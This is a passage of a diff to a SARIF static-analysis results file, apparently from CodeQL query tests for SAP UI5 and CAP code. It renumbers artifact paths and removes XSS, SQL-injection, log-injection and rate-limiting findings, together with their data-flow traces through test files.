"uriBaseId" : "%SRCROOT%", - "index" : 397 + "index" : 92 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 398 + "index" : 93 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 399 + "index" : 94 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 400 + "index" : 95 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 401 + "index" : 96 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 402 + "index" : 97 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 403 + "index" : 98 } }, { "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 404 + "index" : 99 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 405 + "index" : 100 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 406 + "index" : 101 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 407 + "index" : 102 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 408 + "index" : 103 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 409 + "index" : 104 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", "uriBaseId" : "%SRCROOT%", - "index" : 410 + "index" : 105 } }, { "location" : { - 
"uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 106 } }, { "location" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 412 + "index" : 107 } }, { "location" : { - "uri" : "qlt.conf.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 413 + "index" : 108 } }, { "location" : { - "uri" : "scripts/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", "uriBaseId" : "%SRCROOT%", - "index" : 414 + "index" : 109 } }, { "location" : { - "uri" : "scripts/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 415 + "index" : 110 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 416 + "index" : 111 } - } ], - "results" : [ { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6311a9ed7e4091a4:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... 
param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 11, - "startColumn" : 20, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8e517fc6fdf32a1a:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 11, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - 
"index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 19, - "startColumn" : 20, - "endColumn" : 26 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "c51cf11a085c01f4:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 18, - "endColumn" : 45 - } - }, - 
"message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 19, - "startColumn" : 20, - "endColumn" : 26 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 27, - "startColumn" : 20, - "endColumn" : 26 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e309bf8540256a05:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... 
(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 27, - "startColumn" : 20, - "endColumn" : 26 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] }, { - "ruleId" : "js/missing-rate-limiting", - "rule" : { - "id" : "js/missing-rate-limiting", - "index" : 68, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "This route handler performs [a database access](1), but is not rate-limited." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 40, - "startColumn" : 25, - "endLine" : 44, - "endColumn" : 8 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "ac6d3bdd3d52ea9b:1", - "primaryLocationStartColumnFingerprint" : "18" - }, - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 9, - "endLine" : 43, - "endColumn" : 11 - } - }, - "message" : { - "text" : "a database access" - } - } ] - }, { - "ruleId" : "js/sql-injection", - "rule" : { - "id" : "js/sql-injection", - "index" : 78, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "This query string depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "4fc3122b51f477a1:1", - "primaryLocationStartColumnFingerprint" : "11" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 19, - "endColumn" : 36 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "ccc6f77c65eccb45:1", - "primaryLocationStartColumnFingerprint" : "12" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 32, - "endColumn" : 36 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "\"console:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 18, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "be9a18716e55d497:1", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 18, - "endColumn" : 41 - } - }, - "message" : { - "text" : "`[INFO] ... 
value}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 18, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "be9a18716e55d497:2", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 13, - 
"endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 